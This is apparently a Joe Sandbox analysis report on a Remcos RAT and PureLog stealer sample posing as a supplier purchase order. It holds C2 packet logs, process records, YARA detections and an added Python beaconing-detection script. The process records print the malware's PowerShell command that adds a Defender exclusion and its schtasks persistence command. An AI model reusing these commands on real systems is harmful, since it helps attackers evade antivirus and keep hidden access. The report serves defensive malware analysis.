Oct 24, 2024 13:00:03.841067076 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:04.450602055 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:05.653594971 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:08.059824944 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:12.872286081 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:16.623457909 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:00:16.626025915 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 13:00:16.631412983 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:00:22.481705904 CEST | 49710 | 80 | 192.168.2.5 | 178.237.33.50
Oct 24, 2024 13:00:46.639147043 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:00:46.642268896 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 13:00:46.647816896 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:01:16.660980940 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:01:16.662873983 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 13:01:16.668288946 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:01:46.670084000 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
Oct 24, 2024 13:01:46.671272993 CEST | 49708 | 2404 | 192.168.2.5 | 192.210.150.14
Oct 24, 2024 13:01:46.676846981 CEST | 2404 | 49708 | 192.210.150.14 | 192.168.2.5
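Added example, not from the report: a periodicity check over the server-to-client packets of the 192.210.150.14:2404 flow listed above (the Remcos check-in that Suricata flagged). The timestamps are copied from the TCP table; packets less than a second apart are merged into one event (the data segment and its ACK of one keepalive), and the script reports the median gap between events and the share of gaps within 10% of it. The thresholds (1 s merge window, 10% tolerance, at least five intervals, 60% regular share) are assumptions, not values from the report. The first two intervals belong to the initial exchange; the rest sit on a 30-second keepalive, which is what a beaconing detection on flow logs would key on.

```python
import statistics
from datetime import datetime

# Server-to-client packets (192.210.150.14:2404 -> 192.168.2.5:49708), copied
# verbatim from the TCP packet table in this report.
C2_SERVER_PACKETS = [
    "Oct 24, 2024 12:58:12.109636068 CEST",
    "Oct 24, 2024 12:58:12.116157055 CEST",
    "Oct 24, 2024 12:58:12.784600019 CEST",
    "Oct 24, 2024 12:58:12.803288937 CEST",
    "Oct 24, 2024 12:58:13.025482893 CEST",
    "Oct 24, 2024 12:58:14.457564116 CEST",
    "Oct 24, 2024 12:58:16.471971989 CEST",
    "Oct 24, 2024 12:58:16.479808092 CEST",
    "Oct 24, 2024 12:58:46.516985893 CEST",
    "Oct 24, 2024 12:58:46.524187088 CEST",
    "Oct 24, 2024 12:59:16.580583096 CEST",
    "Oct 24, 2024 12:59:16.593157053 CEST",
    "Oct 24, 2024 12:59:46.607960939 CEST",
    "Oct 24, 2024 12:59:46.618012905 CEST",
    "Oct 24, 2024 13:00:16.623457909 CEST",
    "Oct 24, 2024 13:00:16.631412983 CEST",
    "Oct 24, 2024 13:00:46.639147043 CEST",
    "Oct 24, 2024 13:00:46.647816896 CEST",
    "Oct 24, 2024 13:01:16.660980940 CEST",
    "Oct 24, 2024 13:01:16.668288946 CEST",
    "Oct 24, 2024 13:01:46.670084000 CEST",
    "Oct 24, 2024 13:01:46.676846981 CEST",
]


def parse_report_time(s: str) -> datetime:
    """Joe Sandbox prints nanoseconds; strptime's %f accepts at most six
    digits, so the fraction is truncated. All stamps share one zone."""
    stamp = s.rsplit(" ", 1)[0]            # drop the zone label
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def burst_starts(times, gap_s: float = 1.0):
    """Merge packets less than gap_s apart into one event and return the
    event start times. Assumption: 1 s separates a keepalive from the next."""
    starts, last = [], None
    for t in sorted(times):
        if last is None or (t - last).total_seconds() >= gap_s:
            starts.append(t)
        last = t
    return starts


def beacon_profile(times, tolerance=0.10, min_intervals=5, min_share=0.6) -> dict:
    """Heuristic periodicity check: a human-driven session has irregular
    gaps, a RAT keepalive sits on one period. Thresholds are assumptions."""
    starts = burst_starts(times)
    intervals = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    if len(intervals) < min_intervals:
        return {"period_s": None, "regular_share": 0.0,
                "intervals": len(intervals), "beaconing": False}
    period = statistics.median(intervals)
    regular = sum(1 for i in intervals if abs(i - period) <= tolerance * period)
    share = regular / len(intervals)
    return {"period_s": period, "regular_share": share,
            "intervals": len(intervals), "beaconing": share >= min_share}


def analyse_c2_flow() -> dict:
    """Run the check over the report's C2 flow."""
    return beacon_profile([parse_report_time(s) for s in C2_SERVER_PACKETS])


if __name__ == "__main__":
    for key, value in analyse_c2_flow().items():
        print(f"{key}: {value}")
```

The same profile works on Zeek conn.log or NetFlow records once they are reduced to per-flow timestamps; the merge window then collapses retransmissions and ACK-only records the same way it collapses the data/ACK pairs here.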
                                  Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                  Oct 24, 2024 12:58:13.567239046 CEST  52858        53         192.168.2.5  1.1.1.1
                                  Oct 24, 2024 12:58:13.576842070 CEST  53           52858      1.1.1.1      192.168.2.5
                                  Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
                                  Oct 24, 2024 12:58:13.567239046 CEST  192.168.2.5  1.1.1.1  0x83f4    Standard query (0)  geoplugin.net  A (IP address)  IN (0x0001)  false
                                  Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
                                  Oct 24, 2024 12:58:13.576842070 CEST  1.1.1.1    192.168.2.5  0x83f4    No error (0)  geoplugin.net         178.237.33.50  A (IP address)  IN (0x0001)  false
                                  • geoplugin.net
                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                  0           192.168.2.5  49710        178.237.33.50   80                5972  C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  Oct 24, 2024 12:58:13.592226028 CEST  71                 OUT        GET /json.gp HTTP/1.1
                                  Host: geoplugin.net
                                  Cache-Control: no-cache
                                  Oct 24, 2024 12:58:14.440066099 CEST  1165               IN         HTTP/1.1 200 OK
                                  date: Thu, 24 Oct 2024 10:58:14 GMT
                                  server: Apache
                                  content-length: 957
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Ascii: { "geoplugin_request":"173.254.250.71", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                  Target ID:0
                                  Start time:06:58:05
                                  Start date:24/10/2024
                                  Path:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                                  Imagebase:0xfb0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2168286100.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  Target ID:3
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                                  Imagebase:0x8b0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                                  Imagebase:0xde0000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:06:58:11
                                  Start date:24/10/2024
                                  Path:C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                                  Imagebase:0x750000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:8
                                  Start time:06:58:13
                                  Start date:24/10/2024
                                  Path:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Imagebase:0x5b0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 74%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:9
                                  Start time:06:58:13
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff6ef0c0000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
                                  Imagebase:0xde0000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:06:58:19
                                  Start date:24/10/2024
                                  Path:C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                                  Imagebase:0xdc0000
                                  File size:1'025'024 bytes
                                  MD5 hash:9FE3811C49214479C36A4F4A35E9CA08
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                    Execution Graph

                                    Execution Coverage:12%
                                    Dynamic/Decrypted Code Coverage:91%
                                    Signature Coverage:3.2%
                                    Total number of Nodes:189
                                    Total number of Limit Nodes:18

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'jq$TJoq$Tejq$pnq$xbmq
                                    • API String ID: 0-1217042899
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ce0760921bed267c13c822437a530b0e2c8a12eeab2056bf028d18e01512cb85
                                    • Instruction ID: f165e1ee26566e0e7493238314a34807f84f69cd030341472df7a253a5f3f387
                                    • Opcode Fuzzy Hash: ce0760921bed267c13c822437a530b0e2c8a12eeab2056bf028d18e01512cb85
                                    • Instruction Fuzzy Hash: 16D1F6B0D15218CFEB64CFA5C848BAEBBB2FF49300F1081A9D419A7244E7785D85CF51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6d0aeab4e35119b0450bb2b50954f3da482af478aacc44f2b551615d528e46b5
                                    • Instruction ID: 95890faeeaa2e5a4ccf8fa714f338d3bdf82c88d4149c0fb40f72d47dfbfc6d5
                                    • Opcode Fuzzy Hash: 6d0aeab4e35119b0450bb2b50954f3da482af478aacc44f2b551615d528e46b5
                                    • Instruction Fuzzy Hash: 8D713A71D04228CFEB24CFA6C8407EABBB6BF89300F04D1EA940DA6251EB705A85CF50

                                    Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                                    • Basic blocks 19fd49b-19fd6b5 (graph nodes 470-488); calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, sub_19fd6b7, GetCurrentThreadId
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 019FD566
                                    • GetCurrentThread.KERNEL32 ref: 019FD5A3
                                    • GetCurrentProcess.KERNEL32 ref: 019FD5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 019FD639
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 803ae5d996efe4fad682ba093393361258142b7283ffe21300bd5c748c83bd10
                                    • Instruction ID: 215abbc603dd45f9de048aeb5c5e5068f6b584af1f58d606d6462f45c90fb512
                                    • Opcode Fuzzy Hash: 803ae5d996efe4fad682ba093393361258142b7283ffe21300bd5c748c83bd10
                                    • Instruction Fuzzy Hash: 665159B09003499FDB18DFA9D548BAEBFF5FF88304F208459D109A7264D7399984CF65

                                    Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                                    • Basic blocks 19fd4e8-19fd6b5 (graph nodes 495-510); calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, sub_19fd6b7, GetCurrentThreadId
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 019FD566
                                    • GetCurrentThread.KERNEL32 ref: 019FD5A3
                                    • GetCurrentProcess.KERNEL32 ref: 019FD5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 019FD639
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 24c5ebd15a36db5371107a635aaed3d7092bf09c4563aac9fb92be2a97f3bc73
                                    • Instruction ID: b45c04279e7f8f3078c8fc1fde0a2f54663452c59fe7cd503193d6273b9633c6
                                    • Opcode Fuzzy Hash: 24c5ebd15a36db5371107a635aaed3d7092bf09c4563aac9fb92be2a97f3bc73
                                    • Instruction Fuzzy Hash: 715146B09003099FDB18DFA9D548BAEBBF5FF88314F208459E509A7364D7389984CF65

                                    Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                                    • Basic blocks 9454b04-9454e55 (graph nodes 842-898); calls CreateProcessA
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09454D46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: da75579ef7ffe3573a33ebbbea62e68657e3bf63b14c3086445a0505a2b731cb
                                    • Instruction ID: 045ca114df00fa4defa27986e9c6ff69b7f15701dd8e397d2ef4a6a33ac556bb
                                    • Opcode Fuzzy Hash: da75579ef7ffe3573a33ebbbea62e68657e3bf63b14c3086445a0505a2b731cb
                                    • Instruction Fuzzy Hash: 25A16E71D00219DFDB25CFA8C9417EEBBB2FF48310F1481AAE819AB250DB759985CF91
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09454D46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: b5810012fdd68f6addec77beea2eee85cc4bee2112eca26dda15d907b28da78a
                                    • Instruction ID: 02372992730e208b69fd7db39998bae1fb6d9d73532efc06f83945cabd1a3f57
                                    • Opcode Fuzzy Hash: b5810012fdd68f6addec77beea2eee85cc4bee2112eca26dda15d907b28da78a
                                    • Instruction Fuzzy Hash: 16915E71D00219DFDB25CFA8C9417DEBBB2FF48310F1481AAE819AB254DB749985CF91
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019FB09E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: c4f4953ce0a2029d62f9f8c361911a780d9f164851ce3732bbd9d247a5eda0a8
                                    • Instruction ID: 2a193c143d9033e0660073bf017e690bf99d5cf5ce96759ecb5b1f88ff7d5d62
                                    • Opcode Fuzzy Hash: c4f4953ce0a2029d62f9f8c361911a780d9f164851ce3732bbd9d247a5eda0a8
                                    • Instruction Fuzzy Hash: 718155B0A00B059FD724DF29D49479ABBF5FF88300F008A2DE58ADBA90D735E945CB91
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 019F59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: ffd38ffe023b9caefb9673d1c730f0563760d1223bbce3a885db6bfc49bd3d28
                                    • Instruction ID: bbc7dcfc7b5f071ae45a4fd85df9fe0a24e7a85a080f9f697520fbdd8404dd55
                                    • Opcode Fuzzy Hash: ffd38ffe023b9caefb9673d1c730f0563760d1223bbce3a885db6bfc49bd3d28
                                    • Instruction Fuzzy Hash: C641EFB1C00719CFDB24CFA9C984BDDBBB5BF48304F20816AD508AB255DB76694ACF90
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 019F59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: ca86511c9a24fee457deab5ba16321e3b171eca12b66a0d3514afd34fc34bda4
                                    • Instruction ID: bf988d736eb7d182ae7a3fe15ee000374b79044df4c9102c469d00b261dbdb48
                                    • Opcode Fuzzy Hash: ca86511c9a24fee457deab5ba16321e3b171eca12b66a0d3514afd34fc34bda4
                                    • Instruction Fuzzy Hash: 9741FFB0C0071DCFDB24CFA9C984B8DBBB5BF49304F20806AD508AB255DB766949CF90
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09454918
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: d2a40b8e36a277c0de149379b798c6701ae669e5d42d08bdcc6f2fdfbe3e0521
                                    • Instruction ID: 6d1f1724c99b100e49bedaf649e1e99044124367b9ee6b993501e5f6eb59e4b7
                                    • Opcode Fuzzy Hash: d2a40b8e36a277c0de149379b798c6701ae669e5d42d08bdcc6f2fdfbe3e0521
                                    • Instruction Fuzzy Hash: F42126759003599FCB14DFA9C981BEEBBF1FF48310F10842AE959A7250C7789950CBA0
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07BD0CB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: cb63d0e25cd60457feb393a470c434f69772adc479a7123e3284ad9361118584
                                    • Instruction ID: e6685c61cf2a832ad3c522620759c824f25bf77e8d61f23f784571ea386b31af
                                    • Opcode Fuzzy Hash: cb63d0e25cd60457feb393a470c434f69772adc479a7123e3284ad9361118584
                                    • Instruction Fuzzy Hash: A321C0B5D002499FDB10DF9AD884ADEFBF5FB48310F18842AE919A7310D775A944CFA4
                                    APIs
